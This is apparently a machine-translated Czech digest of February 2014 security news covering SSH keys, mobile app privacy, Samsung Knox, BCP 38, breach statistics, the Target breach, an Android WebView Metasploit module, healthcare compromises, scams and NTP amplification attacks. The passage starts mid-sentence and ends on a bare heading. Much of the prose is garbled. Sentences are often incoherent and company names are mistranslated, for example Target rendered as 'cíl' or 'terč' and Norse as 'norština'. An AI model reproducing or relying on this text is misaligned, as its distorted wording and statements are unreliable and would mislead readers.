světově nejvíce citlivých údajů je široce dostupný a velmi nechráněná, takže mnoho organizací otevřený věčným kybernetickým útokům a kompromisů. " "generální ředitelé, CIO, CISO a ostatní IT bezpečnost manažeři jsou tolerantní k bodu šílenství, pokud jde o kontrolu, ochranu a detekci SSH, nejpoužívanější zabezpečení a ověřování technologií mezi administrátory, servery, a mraky, "řekl Venafi CEO Jeff Hudson. "To je nebezpečná situace, podobný na což lišek klíče od slepice domů. Mají povoleno zabezpečení SSH na vymknout kontrole, což ve skutečnosti staví jejich organizace v ohrožení. Celková neschopnost reagovat na porušení otáčením všech SSH klíče znamená, CISO je třeba více investovat do buldozery jejich datových centrech než firewallů, "dodal Hudson.


400 iOS a Android aplikace analyzovány na rizika ochrany osobních údajů a bezpečnosti
28.2.2014 Mobil

Nová zpráva analyzuje chování top 400 iOS a Android aplikací pro posouzení stavu bezpečnosti mobilních app a identifikovat trendy ovlivňují spotřebitele a podniky s růstem BYOD a mobilní prvních pohybů. Appthority analyzovaných nejnovější seznam top 400 aplikace poskytované Apple a Google, a společnost ve srovnání s výsledky údajů ze zprávy o Appthority Summer 2013 poskytují širší vhled do vývoje app ekonomiky. "Mobilní aplikace přináší i obrovskou příležitost a obrovské riziko pro podniky a jejich zaměstnance," řekl Domingo Guerra, prezident a spoluzakladatel, Appthority. "Firmy vědí, že je nutné posílit jejich pracovní sílu využívat mobilitu a zároveň chrání citlivá a cenná firemní data. Vzhledem k tomu, BYOD rychle proměnila Bring Your Own aplikace, je nezbytné pro IT administrátory a bezpečnostní mít plný přehled a kontrolu nad mobilních aplikací, které stávající potenciál Bezpečnost a soukromí rizika ". 95% z top 200 volných iOS a Android apps vykazují alespoň jednu rizikového chování:

70% umožňují sledování polohy
69% umožnit přístup k sociálním sítím
56% identifikovat uživatele
53% jsou integrovány s reklamními sítěmi
51%, aby in-app nákupu
31% umožnit adresáře a seznamy kontaktů, které mají být přečíst.
S více než milion aplikací v Apple App Store a také v Google Play, app tituly uvedené v top 100 se neustále mění. Ve skutečnosti, podle Appthority v oblasti výzkumu 57% z top zdarma iOS aplikací pád z vrcholu 100 seznamu každých šest měsíců. Kromě změny app tituly, app verze jsou také pravidelně aktualizovány vytváří čistý novou aplikaci téměř každý měsíc. Z tohoto důvodu je analýza 100 nejlepších aplikací v daném okamžiku rychle zastará.


Samsung ohlásil mobilní firemní software Knox 2.0

28.2.2014 Mobil
Po představení nové verze smartphonu Galaxy S5 se snímačem otisků prstů představil Samsung druhou generace podnikového mobilního softwaru Knox. Ta podporuje funkce ovládání přístrojů Samsung, které budou uvedeny ve druhém čtvrtletí letošního roku.

Knox 2.0 poskytuje správcům IT možnost sledovat prostřednictvím cloudu všechna zařízení Samsung i služby v nich spuštěné a také aktivovat systém jednotného přihlášení pomocí zařízení Gear. Knox 2.0 byl ohlášen v rámci konference Mobile World Congress 2014 v Barceloně. Výrobce představil aktualizované tržiště aplikací Samsung Knox, které bude integrováno ve verzi Knox 2.0. V obchodu bylo doposud asi 150 podnikových aplikací přístupných koncovým uživatelům. V nové verzi se objeví také mobilní verze služeb Office 365 nebo Google Docs.

Stejně jako jiné nástroje MDM může Knox omezovat instalaci vlastních programů uživatelem. Společnost rovněž uvedla, že ve verzi 2.0 dojde k důkladnějšímu oddělení podnikových a soukromých aplikací, e-mailu a dalších služeb.

Aplikace Knox vytváří v mobilních zařízeních Samsung samostatnou oblast, která má svůj vlastní runtime, sadu programů a dat oddělené od soukromých programů konkrétního uživatele smartphonu nebo tabletu. Knox tedy umožňuje uživateli bezpečně sdílet osobní a firemní data a aplikace v rámci jednoho zařízení.

V nové verzi byla doplněna podpora řady dalších nástrojů MDM a EMM, pokud tyto produkty třetích stran pracují v nechráněné části zařízení. Mezi podporované produkty patří například Good, Mobile Iron nebo Fixmo.

Měsíční poplatek na používání cloudové služby Knox 2.0 je stanoven na 3,60 dolaru na uživatele.

Původní verze Knox byla uvedena v říjnu 2013 a v současnosti ji používá více než 1 milion uživatelů. Celkový počet stažených aplikací Knox přesahuje 25 milionů. Očekává se, že komplexní podpora Knox 2.0 bude k dispozici v nově představených přístrojích Galaxy S5 a Gear 2. Společnost ovšem letos chystá uvedení dalších modelů s podporou tohoto zabezpečení.


DDoS a BCP 38

27.2.2014 Počítačový útok

Docela často se v mnoha seznamech budeme slyšet termín Best Current Practice (BCP) 38 roznášeno a další doporučení k realizaci [1] [2] [3] [4] (viz nanog Mailing archiv seznam). Někteří budou říkat "to pomůže při zmírňování DDoS" a dokonce i ostatní budou ještě stát "Všichni poskytovatelé internetových služeb (ISP) by měla provádět toto." Teď před filozofické diskuse následovat v komentářích, mohlo by to být dobrý nápad, aby diskutovali, technicky , co to je? A možná to, co to může dělat?

BCP 38 AKA RFC 2267 [5] je metodika nejlepší praxe kolem vniknutím filtrování provozu. Specifický účel, jak je uvedeno v RFC abstraktně "zakázat DoS útoky, které používají padělané IP adresy, které mají být šířeny z" za "poskytovatele služeb Internetu je (ISP), agregace bodu". [5]

BCP 38 vymezuje pojem "omezení tranzitní dopravy", která pochází z "downstream sítě vědět, a vnitřně inzerované předpony" [5, str.4]. V příliš zjednodušené schéma (Můj výklad RFC, komentáře a opravách vítejte), znamená to, že ISP říká:

Dejte nám vědět, pokud užíváte nebo jste realizovány BCP38? Doporučujeme ji a pocit, že má technický význam a mohou pomoci snížit riziko!

Odkazy:

[1] https://isc.sans.edu/diary/A+Chargen-based+DDoS% 3F + chargen + je + stále + + věc% 3F/15647

[2] https://isc.sans.edu/diary/Disaster+Preparedness+-+Are+We+Shaken+or+Stirred% 3F/11431

[3] https://isc.sans.edu/forums/diary/Where+Were+You+During+the+Great+DDoS+Cybergeddon+of+2013+/15496

[4] https://isc.sans.edu/podcastdetail.html?id=3260

[5] http://tools.ietf.org/html/bcp38


800M vystavené záznamy, aby 2013 rekordní rok pro narušení dat
27.2.2014 Incidenty
Navzdory často opakované tvrzení, že insider hrozba je ta organizace by měly být díval se na, čísla a statistiky týkající se 2.013 narušení dat ukazují, že riziko je mnohem menší než ten v souvislosti s útoky přicházející z vnějšku. Risk Based Security a Open Nadace Security analyzoval čísla a podrobnosti 2164 ztráty dat incidentů hlášených v roce 2013, a dospěli k závěru, že 72 procent z těchto incidentů se podílejí mimo útočníků, a 25 procent zúčastněných zasvěcenci. Je také dobré vědět, že poruší zapojené zasvěcenci byly způsobeny více nehod a selhání lidského faktoru, než škodolibost. A zatímco počet případů incidentů ztráty dat v roce 2012 téměř o třetinu větší, že pro rok 2013, počet záznamů vystaven v roce 2013 porušení dosáhla rekordních 823 milionů. Většina úniků dat zasáhla podniky, následovaný vládou, zdravotnických a vzdělávacích institucí, a to by nemělo být zcela neočekávané, že drtivá většina z vystavených záznamů byla ukradena z podniků, jakož i:

Také by nemělo být překvapením, že 45,5 procenta z porušení hit organizace se sídlem v USA, a že ti, tvořily 66,5 procenta z napadených záznamů (jednotlivých států USA, Kalifornie vede seznam s asi 370 milionů záznamů vystaven) .

Je zajímavé, že Jižní Korea je druhým ze seznamu zemí, pokud jde o vystavených záznamů - některé 140 miliony e-mailů adresy a identifikační čísla byla ohrožena hack věřil být namontovány podle severokorejských hackerů proti dosud veřejně neznámých organizací. Tento útok je také třetí místo na seznamu nejlepších 10 narušení dat incidentů všech dob. Adobe hack vrcholy tohoto seznamu, pokud hack firemních systémech vystavených jména zákazníků, ID, šifrovaných hesel a čísel debetní / kreditní karty s datem vypršení platnosti, zdrojový kód a další informace týkající se objednávek zákazníků - to vše ve všech 152000000 záznamy byly ohroženy. Nedávná Target porušení je na pátém místě, a expozice údaje, které se stalo v důsledku chyby v Pinterest je API končí seznamu. Celkový počet vystavené záznamy v roce 2013 je tak velký, protože z těchto masivních porušení, ale to je zajímavé poznamenat, že o něco více než polovina hlášených incidentů vystaveny pouze mezi jedním až 1000 záznamů. také zajímavou statistiku: 260 z porušení zveřejněných v roce 2013 představoval Následné události pro ovlivnil organizaci, a šedesát organizací hlášeno několik incidentů během roku 2013. Pokud máte zájem o více informací a statistiky, doporučuji podívat se na velmi podrobnou zprávu .


Náklady na porušení dat Target převyšuje 200.000.000 dolar
27.2.2014 Kriminalita
Finanční instituce i nadále reagovat na masivní porušení dat na cíl . Podle údajů shromážděných spotřebitelů Bankers Association (CBA) a Credit Union National Association (CUNA) náklady spojené s porušením dat Target přesáhnout částku 200 milionů dolarů.

CBA odhaduje, že náklady na nahrazení karty pro své členy, aby dosáhly 172.000.000 dolarů, oproti počáteční zjištění z 153 milionů dolarů CUNA uvedla, že náklady na spořitelních a úvěrních družstev se zvýšil na 30,6 milionů dolarů z původní odhad ve výši 25 milionů dolarů. Zatím karty nahrazeny členy ČBA a spořitelních a úvěrních družstev tvoří více než polovinu všech postižených karet. Mezi členy CBA a CUNA, 21,8 milionů z 40 milionů napadených karet byly nahrazeny. To představuje 54,5 procenta z karet Target zjevil, aby mohla být ohrožena v důsledku porušení prosinci dat. "Finanční instituce všech velikostí byli agresivní při zajišťování jejich zákazníci jsou chráněny v reakci na narušení dat Target. Členy ČBA se aktivně vyměnit karty, zvýšené sledování podvodů úsilí a rozšíří call centra hodiny. Spotřebitelé by měli být jisti, naši členové jsou při každém kroku, aby se minimalizovalo dopad této masivní porušení, "řekl Richard Hunt, prezident a generální ředitel společnosti CBA. "Družstevní záložny jsou nahrazeny nebo nahradí 85% svých karet ovlivněna Target porušení bez nákladů na jejich členům, "řekl Bill Cheney, prezident a generální ředitel společnosti Cuna. "Kombinovaná 200.000.000dolar náklady nese výhradně bankami a družstevními záložnami ukazuje, do jaké míry se finanční instituce jít chránit své zákazníky a členy." kombinovaná 200.000.000dolar cena není faktor v nákladech na přístup k finančním institucím jiným než spořitelních a úvěrních družstev nebo členy CBA, ani to vzít v úvahu všechny podvodné aktivity, které by mohly došlo nebo může dojít v budoucnu. Podvodné aktivity by tlačit náklady na narušení dat Target pro průmysl mnohem vyšší, protože spotřebitelé by nenese odpovědnost.


70% Android zařízení citlivá na povolený vzdálený přístup využít
27.2.2014 Mobil
Nedávné vydání z Metasploit modul , který umožňuje útočníkům vzdáleně přistupovat ("get shell") na většině Android-běh zařízení je opět zvýšil velmi dobrou otázku: "Jak můžeme donutit dopravcům a prodejcům dodávat aktualizace zabezpečení pro uživatele v aktuální způsobem? " chyba je v WebView programovací rozhraní Androidu. Kromě dává útočníkům přístup k fotoaparátu zařízení "a systém souborů se přes něco tak snadné nastavit jako webovou stránku zaminované, to může být také započíst pomocí útoku Man-in-the-Middle dodat na trojanized aktualizace app což by pak umožnilo útočníkům přístup všechny věci, které aplikace sama o sobě má oprávnění k použití. Podle Ars Technica , zranitelnost v pochybnost byl zveřejněny v prosinci 2012, a Google (konečně!) pevně jej v listopadu 2013, kdy se uvolní Android 4.2. Tod Beardsley, technický vedoucí k Metasploit rámce, říká, že tato chyba zabezpečení je "docela velký problém", a 70 procent zařízení, tam jsou zranitelní, protože běží Android verze pod 4.2. "Ve zcela nepřekvapující kroucení, jsem udělal rychlý přehled telefonů jsou dnes k dispozici na no-smlouvy stojanu na několik halových obchodů, a každý ten, který jsem viděl byly vystaveny po vybalení z krabice, "řekl dodal . "A ano, to je tady v USA, ne nějaká vzdálená místa jako je Moskva, Rusko." "Doufám, že zveřejněním modul EZ-2-Use Metasploit, že ji zneužívá, můžeme snad tlačit některé dodavatele k zajištění že jedno-klikněte zranitelnosti, jako to nevydrží 93 + týdnů ve volné přírodě, "dodal. Není moc, že uživatelé mohou udělat, aby tento problém vyřešit, kromě otravovat jejich nosičů ve velkých počtech v naději, že aktualizace zabezpečení budou zveřejněny spíše dříve než později, doufám, že počítačoví zločinci se nespustí používat modul en masse, a být opatrní, na které spojuje klikněte na při používání jejich zařízení se systémem Android. Uživatelé zařízení, které pobírají jejich aktualizace operačního systému přímo od Google, jsou bezpečné , ačkoli.


Poučení z blokování 100 milionů kybernetických útoků
27.2.2014 Kriminalita
Použití reálných dat od 100 m + škodlivého hack pokusy FireHost blokovány v posledních 12 měsících, které vypracovala zprávu Troj, která obsahuje průvodce čtvrt po čtvrtletí do největších počítačové kriminality trendy a incidentů v roce 2013, včetně odborné analýzy z obou FireHost IT bezpečnostní týmy a partnery.

Klíčové celkové závěry a trendy pro rok 2013:
FireHost zablokoval více než 100 m kybernetických útoků v roce 2013
Cross-site scripting a SQL Injection jsou nejpopulárnější druhy útoků v roce 2013
Hackeři zahájil další útoky z komoditního mrak, než kdy předtím
Údaje FireHost naznačoval existenci "blackholing" efektu
Hlavní bezpečnostní incidenty, jako je například porušení dat Target snížil počet útoků na firemních webových aplikací.
Chris Drake, FireHost CEO a zakladatel, nastínil účel zprávy Troj FireHost je, "Kybernetické útoky mohou zdát jako náhodné incidenty v té době, ale když máte druh škodlivého útoku dat, které jsme vyvinuli v průběhu minulého roku, můžete začít korelovat tyto útoky trendy s 2013 největších narušení příběhy dat - z nichž bylo mnoho ". "FireHost je velmi úzce spolupracuje s ostatními vedoucími a inovativní praktiky v oblasti počítačové bezpečnosti komunity sledovat, dokumentů a blokovat útoky, jakmile jsme se s nimi setkají. To je jeden z hlavních důvodů pro výrobu čtvrtletní zprávu Troj. " rok XSS a SQL Injection první čtvrtletí roku 2013 udával tón pro to, co mělo přijít v příštích 12 měsících. Cross-Site Scripting je nejrozšířenější Superfecta Typ útoku v 1. čtvrtletí (s 1,2 m útoků zablokovaných), a bylo by tomu tak i nadále v průběhu celého roku, roste v popularitě velmi mírně každé čtvrtletí. SQL injection útoky budou následovat podobný trend, zvýšení objemu podstatně více než čtvrtiny jednoho, dvou a tří . obvykle výsadou pouze nejtalentovanějších hackerů, zvýšená popularita SQL Injection a možnost, že tyto útoky byly stává snadnější automatizaci byl důvod ke znepokojení. FireHost vydal ostrý upozornění na problematiku jako součást své Q3 zprávy Troj, kde SQL injection útoků zvýšil o téměř 100 tisíc ve srovnání s 2. čtvrtletím. V roce hackeři se obrátil na komoditní cloudu Během 2. čtvrtletí 2013 FireHost blokován téměř 24 milionů kybernetických útoků, včetně velké v počtu společných webových útoků procentní nárůst. Ve snaze odhalit příčinu za tímto trendem, bezpečnostní experti FireHost zjistil, že smíšené, automatizované útoky byly čím dál více používají v rámci cloud poskytovatelů služeb sítě. Ve skutečnosti je to podporováno tvrzení poskytovatele zabezpečení služby Solutionary, že cloud služby Amazon veřejné hostí více malwaru než jakýkoli jiný poskytovatel. V nedávné zprávě bezpečnosti IT, společnost navrhla, že poskytovatelé komodita oblačnosti že "dělal to úspornější pro nebezpečné herci využívat jejich služby infikovat miliony počítačů a obrovské množství podnikových systémů." generální ředitel a zakladatel FireHost, Chris Drake vysvětluje důvody za Tento znepokojující trend, "Počítačoví zločinci lze snadno nasadit a spravovat výkonné botnety, které běží na cloudové infrastruktury. Bohužel, mnoho poskytovatelů cloud dont dostatečně ověřit nové zákazníky sign-up, takže otevření účtů s falešnými informacemi je docela snadné. " 2013 je největší bezpečnostních IT incidentů Největší porušení dat incidentu v roce 2013 postihla americký maloobchod obr, terč, který vystavil údaje z tolik jako 110 milionů zákazníků - Důsledky, které se i nadále vyvíjet v letošním roce. Stejně jako blackholing účinku popsaného v Q4 Troj zprávě FireHost je, Tom Byrnes, ThreatSTOP generální ředitel, se domnívá, že se snížil počet útoků blokovaných FireHost v průběhu 4. čtvrtletí roku 2013 by mohlo být k té jediné porušení dat. "porušení údaje Cíl byl monumentální a je to Není divu, že to mělo vliv na údaje útoku FireHost je. Existuje jen několik set zločinecké gangy po celém světě běží tento druh počítačové kriminality provozu, takže akce jen málo z nich může signalizovat velký posun v průmyslu jako celku. Určitě jsme to viděli v sestavení až do období Vánoc a Cíl útoku. Během této doby, inteligentní hackeři mohou být ignorovány servery FireHost je úplně a zaměřila veškeré své úsilí na získání spotřebitelských dat během náročného on-line maloobchodní sezóny. Jiní by prostě byli příliš zaneprázdněni běží až poplatků na kreditních kartách cílových zákazníků "obtěžovat dělat něco jiného. "Byl to podobný případ v jaro / léto 2013. Počet útoků filtrovat podle IPRM služby FireHost dramaticky poklesl, a já bych se nedivil, kdyby to bylo, z části, kvůli velké IRS porušení dat. Organizovaní zločinci byli příliš zaneprázdněni chytnout identity a kradou miliardy dolarů v daňových náhrad se starat o cílení na firemní data, jako jsou aplikace hostované na infrastruktuře FireHost je. " Chris Hinkley CSSIP a senior bezpečnostní architekt na FireHost pokračoval, "to je zajímavé porovnat útoku trendy a útok zdroje s medializovaným informace o známých narušení dat a útoků. "Jako provozu od poněkud organizovaných zdrojů, např. botnety a dalších známých špatných IP, je výrazně vyšší, než je tomu u více obvyklých útoků DDoS stylu, to obvykle koreluje s hackery objevování nové využití nebo typ útoku, a široký zametací snaha najít vnímavé cíle. To může být velmi dobře byl případ s nedávným Target porušení. Je to vyšlo na světlo, že cíl porušení může pocházet pouze z jednoho koordinovaný útok, při kterém hackeři ohrožena několika obchodech. Co se lze naučit z toho je, že i když si nemyslím, že vaše firma bude čerpat přímé pozornost před hackery, můžete si být jisti, že je vysoká pravděpodobnost, že vaše servery jsou zjišťovány oportunní zločinci, kteří jsou neustále hledají tak snadné " Otevře se okno "dovnitř"


Epidemie kybernetických útoků kompromitujících zdravotnické organizace
27.2.2014 Kriminalita
Sítě a internet-připojený zařízení organizací v téměř každé kategorii zdravotnictví - z nemocnic na pojištění dopravců na farmaceutické společnosti - byly a nadále ohroženy úspěšných útoků. síť kompromis často vede k porušení dat, případně vystavit osobně identifikovatelné Informace o miliony spotřebitelů, jakož i vlastní duševního vlastnictví a fakturačních systémů organizace. Kromě toho, tyto napadené sítě umožňují zločinci použít síťovou infrastrukturu a zařízení, organizace, aby zahájily útoky na další sítě a provádět miliardy dolarů v hodnotě z podvodných transakcí. Nová zpráva SANS-skandinávské odhaluje mnoho poznatků a charakteristické závěry. Mezi nejvíce znepokojující byly následující:

49917 jedinečné události škodlivého charakteru se konala v rámci zdravotnického IT prostředí v době, kdy byla inteligence sešli, to byl malý vzorek dat shromážděných během tohoto období.
Sítě a zařízení na 375 US-založené organizace zdravotní péče v souvislosti byly ohroženy během tohoto období, a některé z nich jsou stále ohrožena.
Ohrožena zařízení včetně vše z radiologie zobrazovací software, firewally, na webových kamer, na poštovních serverech.
Nejčastěji napadené systémy byly VPN, které představovaly více než 30 procent všech napadených připojených zjištěných koncových bodů.
"Tato úroveň kompromisu a řízení by mohlo snadno vést k širokému spektru trestné činnosti, které jsou v současné době nejsou zjištěny. Například, mohou hackeři zapojit do rozsáhlé krádeže informací o pacientech, která zahrnuje vše od zdravotních podmínek na čísla sociálního zabezpečení na domácí adresy, a mohou dokonce manipulovat zdravotnické prostředky používané ke správě kritické péče, "řekl Filkins. "Pro mnoho organizací, které se řídí přísnými předpisy, jako je například zdravotní pojištění Přenosnost a odpovědnost Act (HIPAA), kompromisy a porušení vede k masivní pokuty. V roce 2013, pokuty v rozmezí od 150.000 dolar a šel až na 1,7 milionů dolarů v široce propagoval Wellpoint případě. " norština identifikované napadené zařízení a sítí s její globální ohrožení zpravodajské infrastrukturu, síť více než šest milionů senzorů a lákadla nové generace, se nachází v 38 globálních datových center a 20 velkých internetových výměny. Když napadené organizace vycházejí škodlivý provoz IP, infrastruktura jej rozpozná a okamžitě sleduje ji zpět vlastníkovi. široká škála organizací vyzařoval škodlivý IP provoz, mnoho z nich po celé měsíce a někteří po celou dobu trvání studie - to znamená, že nikdy zjištěn jejich kompromisy a odchozí nebezpečné komunikace. Nejen, že to bylo problematické pro cíl útoku, ale otevřený útok povrch otevřel dveře k útokům na jiné organizace. Ačkoli mnoho typů organizací byly ohroženy, jeden druh produkoval většinu škodlivého provozu:

Zdravotnictví Poskytovatelé - 72 procent škodlivého provozu
Zdravotnictví Obchodní partneři - 9,9 procent škodlivého provozu
Zdravotní plány - 6,1 procent škodlivého provozu
Zdravotnictví clearinghouses - 0,5 procent škodlivého provozu
Farmaceutické - 2,9 procent škodlivého provozu
Další související zdravotní péče osoby - 8,5 procent škodlivého provozu.
Přestože drtivá většina napadených zdravotnické organizace se vztahují předpisy, jako je HIPAA a HITECH, je stejně důležité poukázat na to, že pokračující útoky a kompromisy kladou značnou finanční zátěž na pacienty. Cybercrimes jako krádež identity, odcizení informací a podvody umístit nejen extrémní nepohodlí pro jednotlivce, ale také řídit další výdaje na zdravotní péči, které pacienti nemusí být možné obnovit. Zatímco většina spotřebitelů jsou chráněna proti krádeži a podvodu výdajů e-commerce související, které jsou odpovědné za náklady spojené s oslabeným insurance záznamů lékařských a souborů -. Náklady, které dosáhl 12 miliard dolarů v roce 2013 : "Co SANS a skandinávské objevili v této zprávě je, v slovo, alarmující, "uvedl Sam Glines, generální ředitel společnosti norštiny. "Prostý počet útoků byl spáchán proti zdravotnické organizace je ohromující, zatímco obrana na místě nejsou zdaleka nestačí k jejich neutralizaci. Takže i když zdravotnictví průmysl nadále hledat způsoby, jak chránit svá data, mnoho organizací stále ještě nejsou schopny správně chránit kritická data, a obě společnosti a spotřebitelé zaplatí cenu. "


Americké podniky utrpěly 666000 interních porušení bezpečnosti
27.2.2014 incidenty
Přes 666.000 vnitřní narušení bezpečnosti se konal v amerických podnicích v posledních 12 měsících, v průměru 2560 za každý pracovní den, nový výzkum odhalil. Zjištění, které se projevily IS rozhodnutí, také zjistil, že i přes tuto pravidelného výskytu, pouze 17,5% IT manažerů považují zasvěcených hrozby se ve svých prvních třech bezpečnostních priorit.

Nová zpráva upozorňuje na problematiku vnitřní bezpečnosti jako větší výzvu pro větší organizace, s 40% podniků s více než 500 zaměstnanců, kteří měli vnitřní narušení bezpečnosti v loňském roce. To také porovnává výskyt a odborník v oblasti IT je postoj k insider hrozby UK, kde byl trend opakoval jen s 21% vyjadřovat znepokojení navzdory více než 300.000 interních bezpečnostních incidentů v loňském roce. Insider hrozby nadále být relativně nízkou prioritou pro IT profesionály, s výzkumem zjištění problému je přetrumfnuti obavy hrozby virů (67%), ztráty dat (47%) a hackování (39%). Přesto čísla naznačují, že největším zdrojem ztráty dat je ve skutečnosti od zaměstnanců, což znamená, že IT odborníci jsou negovat podívat se na své vlastní vnitřní struktury dostatečně vážně řešit své vlastní problémy. Francois Amigorena, generální ředitel IS rozhodnutí komentoval: "Je lidská přirozenost vidět z externích zdrojů jako největší hrozbu, a že spolu s tím, že insider hrozba je složitý problém zvládnout vedlo k odborníkům v oblasti IT zdánlivě tolerovaly k této otázce. "Tato čísla, a vlivu, který Edward Snowden případ měl minulý rok, jasně ukazují, že vnitřní bezpečnost by měla být výš pořadu IT. Skutečností je, že to je velmi závažným problémem, ale dobrá zpráva je, že tam je hodně, že IT oddělení může udělat pro zmírnění rizika. Je to otázka techniky, stejně jako kulturní jeden, a mohou být řešeny z obou těchto úhlů.


Silná autentizace pro cloudové aplikace z Duo Security
27.2.2014 Bezpečnost
Duo Security rozšiřuje své bezpečnostní platformy, které pomohou zákazníkům chránit přístup k jejich citlivých dat uložených v cloudových aplikací, včetně Salesforce, Google Apps, Microsoft Office 365 a Box.

Podle analytiků společnosti Forrester, bezpečnost přetrvává jako hlavní inhibitor pro organizace, které uvažují cloud přijetí:. 73% hardwarových s rozhodovací pravomocí v oblasti IT zůstávají obavy o bezpečnost veřejný cloud v roce 2013 "Rozhodně jsme vidět ekonomických a manažerských výhod cloudu, ale my jen bude využít jich, jestli můžeme tak učinit bezpečně, "řekl Mark Maher, ředitel Corporate infrastruktury a technologie na New World Systems. "Prosazování silné autentizace umožňuje společnostem, jako je ta naše zachovat kontrolu nad tím, posilující přístup k majetku společnosti, bez ohledu na to, kde se hostitelem, v prostorách nebo v cloudu. Používáme Duo Security chránit přístup do naší sítě VPN a Salesforce." Ověřování platforma Duo Security dvou-faktor je navržen pro integraci s rozlehlou škálu aplikací, zařízení a služeb, které poskytují ochranu pověření uživatele. Pro řešení vyvíjející se povahy hybridních modelů IT, Duo rozšířila podporu na ochranu široce využívány, aplikace produktivity cloud-based a on-line služby, skladování. "K dnešnímu dni jsme se zaměřili na poskytování zákazníkům řešení dvoufaktorové autentizace, která je nejen snadné, ale také dost, aby splňovaly stále se měnící potřeby organizací, velkých i malých flexibilní, "řekl Richard Li. "Kritickým aspektem této flexibility je zajistit, aby naše řešení je schopen poskytnout organizacím bezpečný přístup ke klíčovým IT aktiv, které řídí jejich podnikání. Pomocí cloud přijetí nabírá na obrátkách, toto rozšíření našeho řešení platformy je důležitý pokrok v poskytování našim zákazníkům jediný bod ochrany, kterou vyžadují. " Poznejte lidi z Duo a dozvědět se více o této nejnovější verzi na konferenci RSA 2014 , 24. února - 28.. Duo Security budou umístěny na Expo v stánku # 2518, South Hall.


"Nigerijské" slib: naše sliby - vaše peníze
27.2.2014 Spam

Příběhy točil podle nigerijských podvodníci často ohromí jejich schopnost využívat a přizpůsobovat stejný typ podvodu na celé řadě situací. Většina z těchto situací jsou tragické, ať už souvisí s něčí smrti nebo politické vřavy. To je důvod, proč pokus dát pryč něčí peníze (nebo velkou část z toho), jako slib Bohu, může také přijít jako naprosté překvapení.

Slib byl dán inženýra, který se rozhodl rozdat desítky tisíc dolarů, aby náhodně vybraného uživatele od Internetu. Podle jeho příběhu, on podepsal velmi lukrativní smlouvu v Austrálii, ale po ukončení jeho část zakázky, jeho práce nebyla vyplacena. Zoufalý inženýr přísahal Bohu dát pryč 250,000 dolarů na nějaké náhodné osoby, pokud získal své peníze. Samozřejmě, že příběh měl šťastný konec, a v poslední době, australská vláda souhlasila, že zaplatí. A teď šťastný, inženýr musí splnit svůj slib, a je připraven poskytnout 250.000dolar na štěstí příjemci.

Přestože Google potvrzuje existenci pana Bradyho společnosti, příslib velké sumy peněz by neměly být brány příliš vážně. Podezření by měly být okamžitě zvýšena tím, že soukromý podnikatel psaní z adresy s fbi.gov domény.

Doufáme, že nikdo skončí reagovat a platit za pana Bradyho svatý slib. Koneckonců, šťastný konec pro podvodníky často vysvětluje tragédii pro oběti.


Kaspersky: Mobilní malware se stává podnikáním

27.2.2014 Viry | Mobil
Mobilní malware zažívá prudký vzestup. Jak prudký? Bezpečnostní společnost Kaspersky za minulý rok zaznamenala více než 143 tisíc nových modifikací zákeřných programů, jež se zaměřují právě na mobilní zařízení.

Ve stejném roce bylo k šíření malwaru použito 3,9 milionů instalačních balíčků. „Můžeme s jistotou říct, že kyberzločinec už nadále není osamělým jedincem, ale je součástí propracované obchodní operace,“ zmínila společnost na svém blogu. „Už je celkem jasné, že se vyvinulo celé odvětví, jež se soustředí pouze na zisk, což je z funkcí malwaru celkem zřejmé.“

Data společnosti Kaspersky naznačují, že 98 % veškerého mobilního malwaru v roce 2013 bylo zaměřeno na zařízení operačním systémem Android. Toto zjištění je podporováno i novým výzkumem společnosti Cisco.

„Odvětví mobilního malwaru se stále více zaměřuje na efektivnější vydělávání, to znamená převážně na phishing, krádeže údajů o platebních kartách a převod peněz z bankovních karet na mobilní zařízení a z mobilního zařízení do elektronických peněženek zločinců,“ vysvětluje Kaspersky.

„Kyberzločinci se stali touto metodou nelegálního získávání peněz posedlí. Na začátku roku jsme věděli o 67 bankovních trojských koních. Na konci loňského roku už bylo unikátních vzorků takových aplikací 1321.“

Momentálně většina těchto trojských koní ovlivňuje především uživatele z Ruska, kde se odehrává 40,3 % mobilního kyberzločinu. Kaspersky však upozorňuje, že ani lidé z jiných zemí by svou bezpečnost neměli brát na lehkou váhu. „Očekáváme, že mobilní kyberzločin v roce 2014 poroste i v ostatních zemích,“ upozornila společnost.

Nejznámější případy těchto trojských koní jsou třeba Svpeng, který se šíří přes textové zprávy a snaží se ukrást peníze z bankovních účtů. Dále Perkele, malware, který k šíření používá QR kódy, nebo Wroba, jenž nahrazuje bankovní aplikaci na zařízení a krade přihlašovací údaje.


 


Probíhající NTP amplifikace Útoky
26.2.2014 Počítačový útok

Brett, který nás upozornil na začátku tohoto měsíce, pokud jde o hmotnost využít proti Linksys zařízení se vynořil aktuální problém, že se směrem s probíhajícími zesílení útoků NTP. Dobrý US-CERT shrnutí útoku je zde: https://www.us-cert.gov/ncas/alerts/TA14-013A . Brett znamená, že:

"Jsme svědky masivní útoky na naše servery NTP, pokouší se zneužít zesílení provozu zranitelnosti oznámené minulý měsíc Naše IP adresy jsou zjišťovány adresu v Nizozemsku, a pár z nich -., Ve kterém byly unpatched servery objeveny - jsou byl zasažen asi 3 miliony zfalšovaných paketů za hodinu. (My jsme od opravenou a firewallem zranitelné servery, ale pakety stále přicházejí.) Falešná pakety jsou vyrobeny tak, že se zdají být původní převážně z portu 53 a 80, ale občas mají jiné čísla portů, například 3074 (Xbox) a 6667 (IRC). Jedná se o velmi závažný útok na nás, a já bych ocenil nějakou pomoc při upozorní lidi na to. "

On také poslal po 8 sekund zachycování paketů, které jsem vizualizací, jak je vidět níže.

NTP zesílení útoku

NTP zesílení útoku

Podle Bretta, budou lidé dostávají podobnou návštěvnost vidět mnoho "monitor" dotazy z zfalšovaných zdrojových adres a portů. Jeho ISP je příjem zhruba 3 miliony těchto paketů každou hodinu, zaměřený na 3 IP adresy, které patřily k FreeBSD serverech, které byly ohroženy v jejich výchozích sestav, serverů, které byly nyní záplaty a firewallem. Připomíná nám, že i když byla použita Projekt FreeBSD patch, zranitelný server bude i nadále reagovat na dotazy se stejným počtem odmítnutí paketů. Zatímco oprava eliminuje zesílení provozu, provoz je stále opakoval, a jeho původ je dále zakryta.
Brettův ISP je také vidět sondy jejich IP hledají další zranitelné servery pocházející z IP adresy 93.174.95.119 (NL) ", které mohou být Server řízen osobou (osobami) za napadení. Sondy vyniknout, protože jsou hlášeny tcpdump jako NTPv2, zatímco většina ostatních dopravy je NTPv3 nebo NTPv4. Úroveň 3 byl zřejmě problémy s přetížením včera a dnes, a to může být důvod, proč. "


Geografické hesla jako řešení problému heslo
26.2.2014 Šifrování
